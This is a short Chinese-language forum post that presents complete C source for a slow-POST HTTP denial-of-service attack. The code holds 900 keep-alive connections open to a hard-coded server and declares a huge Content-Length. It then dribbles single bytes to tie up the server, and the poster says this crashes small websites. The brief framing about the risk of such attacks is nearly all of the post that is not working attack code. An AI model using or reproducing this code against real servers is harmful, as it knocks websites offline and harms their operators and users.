- 论坛徽章:
- 0
|
http 的DDOS的攻击应该引起重视. 下面的代码简单的展示了WEB的攻击原理:
- #include <stdio.h>
-
#include <sys/socket.h>
-
#include <sys/types.h>
-
#include <string.h>
-
#include <arpa/inet.h>
-
#include <errno.h>
-
#include <stdlib.h>
-
#include <unistd.h>
-
-
#if 1
-
char buf[] = "POST /a HTTP/1.1\r\nHost: www.xxxx.com\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux x86_64; zh_CN; rv:1.9.0.3) Gecko/2010072118 Firefox/3.0.3\r\nKeep-Alive: 900\r\nConnection: keep-alive\r\nContent-Length: 100000000\r\nContent-Type: application/x-www-form-urlencoded;charset=UTF-8\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: zh-cn,zh;q=0.5\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: gb2312,utf-8;q=0.7,*;q=0.7\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n";
-
#endif
-
-
#if 0
-
char buf[] = "GET / HTTP/1.1\r\nHost: www.xxx.xxx.com\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux x86_64; zh_CN; rv:1.9.0.3) Gecko/2010072118 Firefox/3.0.3\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: zh-cn,zh;q=0.5\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: gb2312,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nif-Modified-Since: Thu, 25 Aug 2011 02:30:24 GMT\r\n\r\n";
-
#endif
-
-
int main(int argc, char *argv[])
-
{
-
int fd;
-
struct sockaddr_in ser;
-
socklen_t lenth;
-
int num = 900;
-
int fd_buf[num];
-
-
memset(&ser, 0, sizeof(ser));
-
ser.sin_family = AF_INET;
-
ser.sin_port = htons(80);
-
ser.sin_addr.s_addr = inet_addr("172.16.0.254");
-
-
printf(buf);
-
int i, num_data;
-
for(i = 0; i< num; i++){
-
if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
-
fprintf(stderr, "socket fail:%s\n", strerror(errno));
-
exit(1);
-
}
-
-
lenth = sizeof(ser);
-
if((connect(fd, (struct sockaddr*)&ser, sizeof(ser))) != 0){
-
fprintf(stderr, "connect fail:%s\n", strerror(errno));
-
exit(1);
-
}
-
-
fd_buf[i] = fd;
-
num_data = write(fd, buf, sizeof(buf) - 1);
-
printf("write num:%d\n", num_data);
-
-
}
-
-
while(1){
-
for(i = 0; i < num; i++){
-
write(fd_buf[i], "a", 1);
-
sleep(100);
-
}
-
}
-
-
return 0;
-
}
上面的代码很简单,攻击程序的代码以想相当小的负荷却足以让一般小型的网站崩溃。
|
|